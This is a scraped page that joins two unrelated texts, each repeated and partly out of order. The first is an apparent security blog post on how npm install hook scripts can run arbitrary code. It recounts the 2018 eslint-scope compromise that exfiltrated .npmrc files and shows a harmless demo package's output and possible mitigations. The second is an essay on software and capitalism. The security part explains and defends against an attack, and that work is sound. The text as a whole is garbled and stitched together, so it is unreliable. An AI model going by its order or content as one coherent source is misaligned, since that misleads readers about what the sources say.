🍺 /usr/local/Cellar/cowsay/3.04: 65 files, 82.9KB
_______________________________________
/ Uh Oh! The install script in this npm \
| package just installed cowsay using |
\ brew. /
---------------------------------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
script: postinstall
added 1 package from 1 contributor and audited 1 package in 11.306s
found 0 vulnerabilities
########################
# Uninstalling package #
########################
script: preuninstall
script: uninstall
removed 1 package in 0.672s
found 0 vulnerabilities
With the new uses of npm, it’s not appropriate to expect all developers to be wary of the malicious activities install hook scripts might perform. Many develoeprs may assume that since the packages are executing safely in the sandbox of their web browser there is no way for malicious packages to compromise their computers.
As the next step, I’m going to conduct a review of legitimate npm packages to see what an appropriate featureset for install hook scripts is. Two initial mitigation thoughts that came to mind were:
Creating a reduced execution environment for these install hooks, such as a DSL that only allows certain filesystem IO that’s scoped only to the packages install directory and a temp folder.
Add a new parameter to dependencies that require install hook script execution so that the consumer has to explicitly authorize it (this would have protected against the eslint-worm3), such as:
npm1 is the de-facto package manager for JavaScript code. Though initially intended for use with node.js, it’s expanded to managing dependencies on the frontend as well. npm makes a developer’s life substantially more convenient, but it provides that convenience at the cost of security. In particular, npm is happy to auto-execute package scripts upon install, thanks to various install hook scripts.
Rising Issues
Historically, the automatic execution of scripts during the install process made sense. The same user privileges that were being used to run npm install were being used to run the node application that leveraged those packages, so any malicious activity could have just as easily been in the package’s JS files (ie executing upon require('package')), instead of needing to be triggered by the install hook scripts. However, this assumption is no longer the case in many situations. As npm is used to manage frontend dependencies this assumption breaks down. A user may execute npm install using their full privileged user account, but the actual JavaScript module in the package will never run outside of the browser’s sandbox. Therefore, the only point at which a package could perform a malicious activity on the user’s machine (such as exfiltrating data from their filesystem, writing arbitrary files, etc.) would be through one of these install hook scripts.
In the Wild
In July of 2018, eslint-escope and eslint-config-eslint were modified of to include a postinstall hook script that located a user’s .npmrc file and send that file to a remote website2. The attacker used previously compromised credentials to publish these malicious versions of the package. Over the next two hours the compromised packages exfiltrated .npmrc files, and since the packages were dependencies of extremely popular packages, babel-eslint, it’s likely they had a noticeable install population3.
{
+ "postinstall": "node ./lib/build.js",
}
npm’s Auto-Run Scripts, According To The Docs
npm details the various scripts that are executed automatically during the install process at cli/doc/misc/npm-scripts#e2346e7/. I’ve reflected the relevant script hooks here that are executed during the install process:
preinstall:
Run BEFORE the package is installed
install, postinstall:
Run AFTER the package is installed.
preuninstall, uninstall:
Run BEFORE the package is uninstalled.
postuninstall:
Run AFTER the package is uninstalled.
Additionally, the docs provide a recommendation (emphasis mine):
Don’t use install. Use a .gyp file for compilation, and prepublish for anything else. You should almost never have to explicitly set a preinstall or install script. If you are doing this, please consider if there is another option. The only valid use of install or preinstall scripts is for compilation which must be done on the target architecture.
The last sentence explains why these hooks exist at all, instead of npm just autodetecting the need to handle .gyp files for compilation: npm is trying to be as flexible as possible.
Demonstrations
To demonstrate what someone could do with these automated hooks, I’ve created a toy package at awendland/npm-install-hook-test. If you clone the repo you can run ./run_demo.sh to see what’s going on (nothing evil will happen). Besides printing out the name of the hook being run at each of the install hook scripts, the package can do two other things:
POST the sha256 of your .bashrc file to a remote server
Use brew to install cowsay
This demonstrates that npm is not putting strong restrictions on the install scripts being executed. Here’s an abbreviated version of what you’d see upon executing run_demo.sh (which 1. builds the package, 2. installs the package, 3. uninstalls the package):
######################
# Installing package #
######################
script: preinstall
script: install
Updating Homebrew...
==> Downloading https://homebrew.bintray.com/bottles/cowsay-3.04.mojave.bottle.tar.gz
Already downloaded: /Users/awendland/Library/Caches/Homebrew/downloads/38854ad3bfa8be16c69e8b9813aebb2526a32b23a8ab3e7c1b33c24164e891c0--cowsay-3.04.mojave.bottle.tar.gz
==> Pouring cowsay-3.04.mojave.bottle.tar.gz
🍺 /usr/local/Cellar/cowsay/3.04: 65 files, 82.9KB
_______________________________________
/ Uh Oh! The install script in this npm \
| package just installed cowsay using |
\ brew. /
---------------------------------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
script: postinstall
added 1 package from 1 contributor and audited 1 package in 11.306s
found 0 vulnerabilities
########################
# Uninstalling package #
########################
script: preuninstall
script: uninstall
removed 1 package in 0.672s
found 0 vulnerabilities
With the new uses of npm, it’s not appropriate to expect all developers to be wary of the malicious activities install hook scripts might perform. Many develoeprs may assume that since the packages are executing safely in the sandbox of their web browser there is no way for malicious packages to compromise their computers.
As the next step, I’m going to conduct a review of legitimate npm packages to see what an appropriate featureset for install hook scripts is. Two initial mitigation thoughts that came to mind were:
Creating a reduced execution environment for these install hooks, such as a DSL that only allows certain filesystem IO that’s scoped only to the packages install directory and a temp folder.
Add a new parameter to dependencies that require install hook script execution so that the consumer has to explicitly authorize it (this would have protected against the eslint-worm3), such as:
title: Where Did Software Go Wrong? description: Computers were supposed to be “a bicycle for our minds”, machines that operated faster than the speed of thought. And if the computer was a bicycle for the mind, then the plural form of computer,…
description: Software is broken, but it’s not because of NPM, startups, AI, or venture capitalists. A deep dive into how we think about and produce code, and how our software systems reflect the manic state of the modern world. image: https://blog.jse.li/software/obfuscated.png title: Where Did Software Go Wrong? | Jesse Li
Computers were supposed to be “a bicycle for our minds”, machines that operated faster than the speed of thought. And if the computer was a bicycle for the mind, then the plural form of computer, Internet, was a “new home of Mind.” The Internet was a fantastic assemblage of all the world’s knowledge, and it was a bastion of freedom that would make time, space, and geopolitics irrelevant. Ignorance, authoritarianism, and scarcity would be relics of the meatspace past.
Things didn’t quite turn out that way. The magic disappeared and our optimism has since faded. Our websites are slow and insecure; our startups are creepy and unprofitable; our president Tweets hate speech; we don’t trust our social media apps, webcams, or voting machines. And in the era of coronavirus quarantining, we’re realizing just how inadequate the Internet turned out to be as a home of Mind. Where did it all go wrong?
SnvvSnvvSnvv/Shutterstock.com
Software is for people
Software is at once a field of study, an industry, a career, a process of production, and a process of consumption—and only then a body of computer code. It is impossible to separate software from the human and historical context that it is situated in. Code is always addressed to someone. As Structure and Interpretation of Computer Programs puts it, “programs must be written for people to read, and only incidentally for machines to execute” (Abelson et al. 1996). We do not write code for our computers, but rather we write it for humans to read and use. And even the purest, most theoretical and impractical computer science research has as its aim to provoke new patterns of thought in human readers and scholars—and these are formulated using the human-constructed tools of mathematics, language, and code.
As software engineers, we pride ourselves in writing “readable” or “clean” code, or code that “solves business problems”—synonyms for this property of addressivity that software seems to have. Perhaps the malware author knows this property best. Like any software, malware is addressed to people, and only incidentally for machines to execute. Whether a sample of malware steals money, hijacks social media accounts, or destabilizes governments, it operates in the human domain. The computer does not care about money, social media accounts, or governments; humans do. And when the malware author obfuscates their code, they do so with a human reader in mind. The computer does not care whether the code it executes is obfuscated; it only knows opcodes, clocks, and interrupts, and churns through them faithfully. Therefore, even malware—especially malware—whose code is deliberately made unreadable, is written with the intention of being read.
Code is multivoiced
Soviet philosopher Mikhail Bakhtin wrote that “the single utterance, with all its individuality and creativity, can in no way be regarded as a completely free combination of forms of language … the word in language is half someone else’s” (Wertsch 1991, 58-59). Any code that we write, no matter how experimental or novel, owes a piece of its existence to someone else, and participates as a link in a chain of dialogue, one in reply to another. The malware author is in dialogue with the malware analyst. The software engineer is in dialogue with their teammates. The user of a piece of software is in dialogue with its creator. A web application is in dialogue with the language and framework it is written in, and its structure is mediated by the characteristics of TCP/IP and HTTP. And in the physical act of writing code, we are in dialogue with our computer and development environment.
Wertsch formulated Bakhtin’s notion of dialogues in terms of voices: “Who is doing the talking?,” he asks—“At least two voices” (1991, 63). While Wertsch and Bakhtin were concerned with human language, we can just as readily apply their insights to software: “the ambiguity of human language is present in code, which never fully escapes its status as human writing, even when machine-generated. We bring to code our excesses of language, and an ambiguity of semantics, as discerned by the human reader” (Temkin 2017). Whose voices do we hear when we experience code?
At the syntactic level, every keyword and language feature we use is rented from the creators of the language. These keywords and grammars are themselves often rented from a human language like English, and these voices too are present in our code. The JavaScript if rents meaning from the English “if,” which is itself rented from German, and in any case, the word does not belong to us, not fully—the word in language is half someone else’s. When we call programming languages, libraries, and frameworks “opinionated” or “pits of despair/success,” we really mean “how loud is the voice of the language in our code?” A comment on the Go programming language by matt_wulfeck on Hacker News illuminates the intentional imbalance between the voice of the programmer and the voice of the language:
Go takes away so much “individuality” of code. On most teams I’ve been on with Python and Java I can open up a file and immediate tell who wrote the library based on various style and other such. It’s a lot harder with Go and that’s a very good thing.
Here we see the way in which voices mediate our action—how does Go mediate the way in which we write and think about code? Jussi Pakkanen, creator of the Meson build system, called the mediating aspect of voices shepherding: “It’s not what programming languages do, it’s what they shepherd you to.” Shepherding, or mediational means, are “an invisible property of a programming language and its ecosystem that drives people into solving problems in ways that are natural for the programming language itself rather than ways that are considered ‘better’ in some sense” (Pakkanen 2020). We internalize the voices of our social relations, and these voices mediate or shepherd our action. Every time we dive into a codebase, speak with a mentor, take a course, or watch a conference talk, we are deliberately adding new voices to the little bag of voices in our mind. This is not purely a process of consumption: in internalizing voices, we form counter-words, mentally argue with them, and ventriloquize them through our own work—in a word, we engage in a dialogue.
Next time you settle down to read some code, listen carefully for the voices inside the code and the voices inside your mind, however faint they sound. I can hear the voice of a senior engineer from my last job every time I write a type definition.
Abstraction and labor
At a higher level, the patterns and strategies we use to structure our code, which we think of as independent of programming languages, such as algorithms, design patterns, architectures, and paradigms, are rented too. Some algorithms are named after famous computer scientists like Dijkstra, Kruskal, and Prim, and these clue us into the rich ensemble of voices speaking in our code. But at the same time, the process of naming obscures the multitude of other voices speaking through these algorithms. Dijkstra’s algorithm is a weighted breadth-first search that uses a priority queue—but the name alone would not tell you this, and in fact, the names “breadth-first search” and “priority queue” obscure still more voices. By attributing the entire history, the chains of dialogue, and the chorus of voices that speak in the algorithm, all to that single name Dijkstra—by seeing one where there are many—they are killed, and the signifier Dijkstra takes their place. This is the process of abstraction.
These obscured chains of dialogue are present in everything, from supply chains, to APIs, source code, and package managers. Run git log in a repository from work, or browse the commits of an open source project—try Postgres if you don’t have one handy. Read the commit messages, puzzle over the diffs, and marvel at the layers of sedimented history. Postgres has nearly 50,000 commits, one in reply to another, each representing hours or days of labor, and lifetimes of accumulated knowledge and experience. It is a recording surface for these dialogues, in which each commit is inscribed; and it is at the level of commits, changelists, and releases that we tame the continuous flow of development by cutting into, segmenting, and abstracting it into units that we can comprehend. One voice at a time, please. One spokesman Dijkstra, one mascot Postgres to hide the complexity.
Every piece of software that we interact with, every company, every project, every product—from your computer’s operating system, to the SaaS vendors your company relies on, the libraries you use, and the routines running on the microcontroller in your refrigerator, hides just as delightfully complicated of a history of production, and this is what brings all of software development together. Marx described this common substance “a mere congelation of homogeneous human labour, of labour power expended without regard to the mode of its expenditure. All that these things now tell us is, that human labour power has been expended in their production, that human labour is embodied in them. When looked at as crystals of this social substance, common to them all, they are—Values” (1867, 48).
NPM is not the problem
In 2016, a JavaScript package called left-pad broke the Internet for a day. The package consisted of eleven lines of code that padded strings to a specified length, turning strings like “5” into strings like “005.” Out of protest over a trademark dispute, left-pad’s creator Azer Koçulu deleted it from the NPM registry, wreaking havoc on an entire ecosystem of packages that depended on it, whether directly or indirectly through transitive dependencies to the nth degree—and these were packages that powered thousands of websites around the world (Williams 2016).
A visualization of the dependency graph for the react-scripts NPM package. Each dot represents a package, and lines connect packages that depend on one another. One of the dots is left-pad; I don’t know which.
According to the discourse at the time, this was a lesson on the fragility of the webs of dependencies and abstractions that we had created, and it was a sign that the NPM ecosystem was fundamentally broken. We had built houses of cards—long chains of dialogue whose links could simply vanish—and all it took was a single developer and his eleven lines of code to tear them down. David Haney, meditating on the left-pad incident, asked in a blog post
Have We Forgotten How To Program? […] I get the impression that the NPM ecosystem participants have created a penchant for micro-packages. Rather than write any functions or code, it seems that they prefer to depend on something that someone else has written (2016).
But we know by now that we have not forgotten how to program: this is how we have always programmed. Everything we write is something that someone else has written; nothing belongs to us; all code is multi-voiced. These webs of dependencies have always existed, but perhaps no system had made the fact quite so obvious as NPM did. Where we see one—one app, one script, one package—the breakages of NPM remind us that there are many.
Software is not creative
Watch as a neural network, initialized from random chaos, trains itself to play Atari Breakout. Watch the tiny machines—the nodes of the network, their connections and conjunctions, break-flows and back-propagations—and watch them converge: at first random contingencies that, in a feedback loop, crystallize into structure. These are machines reproducing machines. These are tiny capitalists. “Universal history is the history of contingencies, and not the history of necessity. Ruptures and limits, and not continuity” (Deleuze & Guattari 1983, 140).
But neural networks, and software in general, do not create new reality—they ingest data and reflect back a reality that is a regurgitation and reconfiguration of what they have already consumed. And this reality that these machines reflect back is slightly wrong. Recall the statistician’s aphorism “all models are wrong, but some are useful.” What happens when we rely on these models to produce new realities, and feed those slightly-wrong realities back into the machines again? What happens when we listen to Spotify’s Discover Weekly playlist week after week, “like” the posts that Facebook recommends to us, and scroll through TikTok after TikTok? I am guilty of all of these, and it would not be wrong to claim that my taste in music and sense of humor are mediated by this mutual recursion between the algorithms and the real world.
And that is exactly it: in the modern world, our social interactions, our devices, governments, and markets, are circulations and flows of the same realities under the same rules. Our software creates new problems—problems that we’ve never had before, like fake news, cyberbullying, and security vulnerabilities—and we patch them over with yet more layers of code. Software becomes quasi-cause of software. These are echoes of the same voices in a positive feedback loop, growing louder and less coherent with each cycle—garbage in, garbage out, a thousand times over.
Who does software benefit?
For many of us fortunate enough to stay home during the coronavirus outbreak, our only interface with the world outside our families and homes—the relays of connection between us, our families, communities and societies—have been filtered through our screens and earbuds. It is apparent now more than ever exactly what software does for us, and what kinds of inequalities it reinforces.
Through Instacart, Amazon Fresh, and other grocery delivery services, we can use an app to purchase a delivery driver’s body for an hour to expose themself to the virus on our behalf. Unsatisfied with even this, some developers have written scripts to instantly reserve the scarce delivery slots on these services.
One developer wrote to Vice’s Motherboard “I designed the bot for those who find it extremely inconvenient in these times to step out, or find it not safe for themselves to be outside. It is my contribution to help flatten the curve, I really hope this’ll help reduce the number of people going out” (Cox 2020). Is that right? Does a bot really reduce the number of people going out, or does it merely change the demographics of who gets to stay home, favoring those with the resources and technical skills to run a Python script and Selenium WebDriver? With a constant and limited number of delivery slots, Joseph Cox points out that these bots create “a tech divide between those who can use a bot to order their food and those who just have to keep trying during the pandemic” (2020).
Instacart bots are just the most recent reincarnation of a long tradition of using the speed of software to gain an edge against humans. In the 2000’s, when concert tickets first started to sell over the Internet, scalpers built bots to automatically purchase tickets to resell them at a higher price. And capitalism, in its infinite flexibility, adapted and welcomed this development with open arms and invisible hands, spawning companies like TicketMaster, which institutionalized and legitimized the practice. But Instacart and TicketMaster are mere symptoms of the problem. We saw the same patterns in the arms race of high-frequency trading. At first, the robots beat the humans. Next, the robots became part of the game, and the robots played against each other. The profits from high-frequency trading dried up, and yet using it became a necessity just to keep up.
These examples give us a decent idea of what software is good for. On its own, it never enables anything truly new, but rather changes the constant factors of speed and marginal cost, and raises the barrier for participation arbitrarily high. Once the software train begins to leave the station, we have no choice but to jump and hang on, lest we get run over or left behind—and we are not sure which is worse. Max Weber, studying the development of capitalism, identified this secularizing, spiralling effect:
The Puritan wanted to be a person with a vocational calling; we must be. For to the extent that asceticism moved out of the monastic cell and was carried over into the life of work in a vocational calling, and then commenced to rule over this-worldly morality, it helped to do its part to build the mighty cosmos of the modern economic order. This economy is bound to the technical and economic conditions of mechanized, machine-based production. (Weber 1920, 177)
A false start: startups
Startups love to save the world, but look at the state of the world now—is this what it’s like to be saved? Is the world even a little bit better because of startups like Instagram, Uber, and Peloton? Startups are spaces of remarkable innovation, and they are experts at channeling the multivoicedness of code—just look at the network of voices that GitLab channels (visualized below). But under capitalism, these voices are distorted and constrained, and they cry “growth, growth!” as venture capitalists and founders demand user acquisition, market share, and revenue—in a word, they demand access to capitalist accumulation.
Systems diagram published by GitLab
The startup founder, no matter how much they claim to love code, love humanity, or love the thrill of the hustle (and they may even believe themself when they say it), loves the growth of capital most of all. The tech founder is a capitalist proper, but capital does not love them back; capital cannot love at all, and the odds are stacked against our hero capitalist. “The larger capitals beat the smaller … It always ends in the ruin of many small capitalists, whose capitals partly pass into the hands of their conquerors, partly vanish” (Marx 1867, 621). Capital accumulates and concentrates, and in the midst of frothy competition, the startup either dies or gets acquired by Facebook or Google, leaving nothing behind but a bullet point on LinkedIn and a blog post signifying an incredible journey. So much for changing the world.
What is to be done?
To revisit that ambitious question we set out to answer, where did it all go wrong? What got us into this mess, this tool-assisted speedrun of accumulation and exploitation? The trick is that we have not been studying software on its own—we’ve established that computers and computer code are veritably saturated with human touch, human voices, and human thought. Software cannot be divorced from the human structures that create it, and for us, that structure is capitalism. To quote Godfrey Reggio, director of Koyaanisqatsi (1982), “it’s not the effect of, it’s that everything exists within. It’s not that we use technology, we live technology. Technology has become as ubiquitous as the air we breathe, so we are no longer conscious of its presence” (Essence of Life 2002).
Where did it all go wrong? At some point, capital became the answer to every question—what to produce, how to produce, for whom to produce, and why. When software, that ultimate solution in search of a problem, found the questions answered only by capital, we lost our way, caught in capital’s snare.
Q: What does software do?
A: It produces and reproduces capital.
Q: Who does software benefit?
A: People who own capital.
Q: What is software?
A: Capital.
A: Capital.
A: Capital.
A: Capital.
But we can break this pattern; we can find our own answers to those questions, and if it’s up to us, the answer does not need to be that answer we’ve been taught, capital. Software is a tool with revolutionary potential, but that is the extent of what it can give us. “Science demonstrates by its very method that the means that it constantly elaborates do no more than reproduce, on the outside, an interplay of forces by themselves without aim or end whose combinations obtain such and such a result” (Deleuze & Guattari 1983, 368).
So, what are the aims and ends that we should direct our software toward? What are the answers to those economic questions, if not capital—or better yet, what questions should we be asking, if not economic?
Protesters across the nation are directly fighting the oppressive structures outlined in this post. Your money will pay for legal aid and bail for people who have been arrested for standing up to police brutality, institutional racism, and the murder of Black men and women like George Floyd, Breonna Taylor, Ahmaud Arbery, and Nina Pop.
At the moment, this is the most efficient means of converting your capital into freedom. If software is good for anything, this is it.
Computers were supposed to be “a bicycle for our minds”, machines that operated faster than the speed of thought. And if the computer was a bicycle for the mind, then the plural form of computer, Internet, was a “new home of Mind.” The Internet was a fantastic assemblage of all the world’s knowledge, and it was a bastion of freedom that would make time, space, and geopolitics irrelevant. Ignorance, authoritarianism, and scarcity would be relics of the meatspace past.
Things didn’t quite turn out that way. The magic disappeared and our optimism has since faded. Our websites are slow and insecure; our startups are creepy and unprofitable; our president Tweets hate speech; we don’t trust our social media apps, webcams, or voting machines. And in the era of coronavirus quarantining, we’re realizing just how inadequate the Internet turned out to be as a home of Mind. Where did it all go wrong?
SnvvSnvvSnvv/Shutterstock.com
Software is for people
Software is at once a field of study, an industry, a career, a process of production, and a process of consumption—and only then a body of computer code. It is impossible to separate software from the human and historical context that it is situated in. Code is always addressed to someone. As Structure and Interpretation of Computer Programs puts it, “programs must be written for people to read, and only incidentally for machines to execute” (Abelson et al. 1996). We do not write code for our computers, but rather we write it for humans to read and use. And even the purest, most theoretical and impractical computer science research has as its aim to provoke new patterns of thought in human readers and scholars—and these are formulated using the human-constructed tools of mathematics, language, and code.
As software engineers, we pride ourselves in writing “readable” or “clean” code, or code that “solves business problems”—synonyms for this property of addressivity that software seems to have. Perhaps the malware author knows this property best. Like any software, malware is addressed to people, and only incidentally for machines to execute. Whether a sample of malware steals money, hijacks social media accounts, or destabilizes governments, it operates in the human domain. The computer does not care about money, social media accounts, or governments; humans do. And when the malware author obfuscates their code, they do so with a human reader in mind. The computer does not care whether the code it executes is obfuscated; it only knows opcodes, clocks, and interrupts, and churns through them faithfully. Therefore, even malware—especially malware—whose code is deliberately made unreadable, is written with the intention of being read.
Code is multivoiced
Soviet philosopher Mikhail Bakhtin wrote that “the single utterance, with all its individuality and creativity, can in no way be regarded as a completely free combination of forms of language … the word in language is half someone else’s” (Wertsch 1991, 58-59). Any code that we write, no matter how experimental or novel, owes a piece of its existence to someone else, and participates as a link in a chain of dialogue, one in reply to another. The malware author is in dialogue with the malware analyst. The software engineer is in dialogue with their teammates. The user of a piece of software is in dialogue with its creator. A web application is in dialogue with the language and framework it is written in, and its structure is mediated by the characteristics of TCP/IP and HTTP. And in the physical act of writing code, we are in dialogue with our computer and development environment.
Wertsch formulated Bakhtin’s notion of dialogues in terms of voices: “Who is doing the talking?,” he asks—“At least two voices” (1991, 63). While Wertsch and Bakhtin were concerned with human language, we can just as readily apply their insights to software: “the ambiguity of human language is present in code, which never fully escapes its status as human writing, even when machine-generated. We bring to code our excesses of language, and an ambiguity of semantics, as discerned by the human reader” (Temkin 2017). Whose voices do we hear when we experience code?
At the syntactic level, every keyword and language feature we use is rented from the creators of the language. These keywords and grammars are themselves often rented from a human language like English, and these voices too are present in our code. The JavaScript if rents meaning from the English “if,” which is itself rented from German, and in any case, the word does not belong to us, not fully—the word in language is half someone else’s. When we call programming languages, libraries, and frameworks “opinionated” or “pits of despair/success,” we really mean “how loud is the voice of the language in our code?” A comment on the Go programming language by matt_wulfeck on Hacker News illuminates the intentional imbalance between the voice of the programmer and the voice of the language:
Go takes away so much “individuality” of code. On most teams I’ve been on with Python and Java I can open up a file and immediate tell who wrote the library based on various style and other such. It’s a lot harder with Go and that’s a very good thing.
Here we see the way in which voices mediate our action—how does Go mediate the way in which we write and think about code? Jussi Pakkanen, creator of the Meson build system, called the mediating aspect of voices shepherding: “It’s not what programming languages do, it’s what they shepherd you to.” Shepherding, or mediational means, are “an invisible property of a programming language and its ecosystem that drives people into solving problems in ways that are natural for the programming language itself rather than ways that are considered ‘better’ in some sense” (Pakkanen 2020). We internalize the voices of our social relations, and these voices mediate or shepherd our action. Every time we dive into a codebase, speak with a mentor, take a course, or watch a conference talk, we are deliberately adding new voices to the little bag of voices in our mind. This is not purely a process of consumption: in internalizing voices, we form counter-words, mentally argue with them, and ventriloquize them through our own work—in a word, we engage in a dialogue.
Next time you settle down to read some code, listen carefully for the voices inside the code and the voices inside your mind, however faint they sound. I can hear the voice of a senior engineer from my last job every time I write a type definition.
Abstraction and labor
At a higher level, the patterns and strategies we use to structure our code, which we think of as independent of programming languages, such as algorithms, design patterns, architectures, and paradigms, are rented too. Some algorithms are named after famous computer scientists like Dijkstra, Kruskal, and Prim, and these clue us into the rich ensemble of voices speaking in our code. But at the same time, the process of naming obscures the multitude of other voices speaking through these algorithms. Dijkstra’s algorithm is a weighted breadth-first search that uses a priority queue—but the name alone would not tell you this, and in fact, the names “breadth-first search” and “priority queue” obscure still more voices. By attributing the entire history, the chains of dialogue, and the chorus of voices that speak in the algorithm, all to that single name Dijkstra—by seeing one where there are many—they are killed, and the signifier Dijkstra takes their place. This is the process of abstraction.
These obscured chains of dialogue are present in everything, from supply chains, to APIs, source code, and package managers. Run git log in a repository from work, or browse the commits of an open source project—try Postgres if you don’t have one handy. Read the commit messages, puzzle over the diffs, and marvel at the layers of sedimented history. Postgres has nearly 50,000 commits, one in reply to another, each representing hours or days of labor, and lifetimes of accumulated knowledge and experience. It is a recording surface for these dialogues, in which each commit is inscribed; and it is at the level of commits, changelists, and releases that we tame the continuous flow of development by cutting into, segmenting, and abstracting it into units that we can comprehend. One voice at a time, please. One spokesman Dijkstra, one mascot Postgres to hide the complexity.
Every piece of software that we interact with, every company, every project, every product—from your computer’s operating system, to the SaaS vendors your company relies on, the libraries you use, and the routines running on the microcontroller in your refrigerator, hides just as delightfully complicated of a history of production, and this is what brings all of software development together. Marx described this common substance “a mere congelation of homogeneous human labour, of labour power expended without regard to the mode of its expenditure. All that these things now tell us is, that human labour power has been expended in their production, that human labour is embodied in them. When looked at as crystals of this social substance, common to them all, they are—Values” (1867, 48).
NPM is not the problem
In 2016, a JavaScript package called left-pad broke the Internet for a day. The package consisted of eleven lines of code that padded strings to a specified length, turning strings like “5” into strings like “005.” Out of protest over a trademark dispute, left-pad’s creator Azer Koçulu deleted it from the NPM registry, wreaking havoc on an entire ecosystem of packages that depended on it, whether directly or indirectly through transitive dependencies to the nth degree—and these were packages that powered thousands of websites around the world (Williams 2016).
According to the discourse at the time, this was a lesson on the fragility of the webs of dependencies and abstractions that we had created, and it was a sign that the NPM ecosystem was fundamentally broken. We had built houses of cards—long chains of dialogue whose links could simply vanish—and all it took was a single developer and his eleven lines of code to tear them down. David Haney, meditating on the left-pad incident, asked in a blog post
Have We Forgotten How To Program? […] I get the impression that the NPM ecosystem participants have created a penchant for micro-packages. Rather than write any functions or code, it seems that they prefer to depend on something that someone else has written (2016).
But we know by now that we have not forgotten how to program: this is how we have always programmed. Everything we write is something that someone else has written; nothing belongs to us; all code is multi-voiced. These webs of dependencies have always existed, but perhaps no system had made the fact quite so obvious as NPM did. Where we see one—one app, one script, one package—the breakages of NPM remind us that there are many.
Software is not creative
Watch as a neural network, initialized from random chaos, trains itself to play Atari Breakout. Watch the tiny machines—the nodes of the network, their connections and conjunctions, break-flows and back-propagations—and watch them converge: at first random contingencies that, in a feedback loop, crystallize into structure. These are machines reproducing machines. These are tiny capitalists. “Universal history is the history of contingencies, and not the history of necessity. Ruptures and limits, and not continuity” (Deleuze & Guattari 1983, 140).
But neural networks, and software in general, do not create new reality—they ingest data and reflect back a reality that is a regurgitation and reconfiguration of what they have already consumed. And this reality that these machines reflect back is slightly wrong. Recall the statistician’s aphorism “all models are wrong, but some are useful.” What happens when we rely on these models to produce new realities, and feed those slightly-wrong realities back into the machines again? What happens when we listen to Spotify’s Discover Weekly playlist week after week, “like” the posts that Facebook recommends to us, and scroll through TikTok after TikTok? I am guilty of all of these, and it would not be wrong to claim that my taste in music and sense of humor are mediated by this mutual recursion between the algorithms and the real world.
And that is exactly it: in the modern world, our social interactions, our devices, governments, and markets, are circulations and flows of the same realities under the same rules. Our software creates new problems—problems that we’ve never had before, like fake news, cyberbullying, and security vulnerabilities—and we patch them over with yet more layers of code. Software becomes quasi-cause of software. These are echoes of the same voices in a positive feedback loop, growing louder and less coherent with each cycle—garbage in, garbage out, a thousand times over.
Who does software benefit?
For many of us fortunate enough to stay home during the coronavirus outbreak, our only interface with the world outside our families and homes—the relays of connection between us, our families, communities and societies—have been filtered through our screens and earbuds. It is apparent now more than ever exactly what software does for us, and what kinds of inequalities it reinforces.
Through Instacart, Amazon Fresh, and other grocery delivery services, we can use an app to purchase a delivery driver’s body for an hour to expose themself to the virus on our behalf. Unsatisfied with even this, some developers have written scripts to instantly reserve the scarce delivery slots on these services.
One developer wrote to Vice’s Motherboard “I designed the bot for those who find it extremely inconvenient in these times to step out, or find it not safe for themselves to be outside. It is my contribution to help flatten the curve, I really hope this’ll help reduce the number of people going out” (Cox 2020). Is that right? Does a bot really reduce the number of people going out, or does it merely change the demographics of who gets to stay home, favoring those with the resources and technical skills to run a Python script and Selenium WebDriver? With a constant and limited number of delivery slots, Joseph Cox points out that these bots create “a tech divide between those who can use a bot to order their food and those who just have to keep trying during the pandemic” (2020).
Instacart bots are just the most recent reincarnation of a long tradition of using the speed of software to gain an edge against humans. In the 2000’s, when concert tickets first started to sell over the Internet, scalpers built bots to automatically purchase tickets to resell them at a higher price. And capitalism, in its infinite flexibility, adapted and welcomed this development with open arms and invisible hands, spawning companies like TicketMaster, which institutionalized and legitimized the practice. But Instacart and TicketMaster are mere symptoms of the problem. We saw the same patterns in the arms race of high-frequency trading. At first, the robots beat the humans. Next, the robots became part of the game, and the robots played against each other. The profits from high-frequency trading dried up, and yet using it became a necessity just to keep up.
These examples give us a decent idea of what software is good for. On its own, it never enables anything truly new, but rather changes the constant factors of speed and marginal cost, and raises the barrier for participation arbitrarily high. Once the software train begins to leave the station, we have no choice but to jump and hang on, lest we get run over or left behind—and we are not sure which is worse. Max Weber, studying the development of capitalism, identified this secularizing, spiralling effect:
The Puritan wanted to be a person with a vocational calling; we must be. For to the extent that asceticism moved out of the monastic cell and was carried over into the life of work in a vocational calling, and then commenced to rule over this-worldly morality, it helped to do its part to build the mighty cosmos of the modern economic order. This economy is bound to the technical and economic conditions of mechanized, machine-based production. (Weber 1920, 177)
A false start: startups
Startups love to save the world, but look at the state of the world now—is this what it’s like to be saved? Is the world even a little bit better because of startups like Instagram, Uber, and Peloton? Startups are spaces of remarkable innovation, and they are experts at channeling the multivoicedness of code—just look at the network of voices that GitLab channels (visualized below). But under capitalism, these voices are distorted and constrained, and they cry “growth, growth!” as venture capitalists and founders demand user acquisition, market share, and revenue—in a word, they demand access to capitalist accumulation.
The startup founder, no matter how much they claim to love code, love humanity, or love the thrill of the hustle (and they may even believe themself when they say it), loves the growth of capital most of all. The tech founder is a capitalist proper, but capital does not love them back; capital cannot love at all, and the odds are stacked against our hero capitalist. “The larger capitals beat the smaller … It always ends in the ruin of many small capitalists, whose capitals partly pass into the hands of their conquerors, partly vanish” (Marx 1867, 621). Capital accumulates and concentrates, and in the midst of frothy competition, the startup either dies or gets acquired by Facebook or Google, leaving nothing behind but a bullet point on LinkedIn and a blog post signifying an incredible journey. So much for changing the world.
What is to be done?
To revisit that ambitious question we set out to answer, where did it all go wrong? What got us into this mess, this tool-assisted speedrun of accumulation and exploitation? The trick is that we have not been studying software on its own—we’ve established that computers and computer code are veritably saturated with human touch, human voices, and human thought. Software cannot be divorced from the human structures that create it, and for us, that structure is capitalism. To quote Godfrey Reggio, director of Koyaanisqatsi (1982), “it’s not the effect of, it’s that everything exists within. It’s not that we use technology, we live technology. Technology has become as ubiquitous as the air we breathe, so we are no longer conscious of its presence” (Essence of Life 2002).
Where did it all go wrong? At some point, capital became the answer to every question—what to produce, how to produce, for whom to produce, and why. When software, that ultimate solution in search of a problem, found the questions answered only by capital, we lost our way, caught in capital’s snare.
Q: What does software do?
A: It produces and reproduces capital.
Q: Who does software benefit?
A: People who own capital.
Q: What is software?
A: Capital.
A: Capital.
A: Capital.
A: Capital.
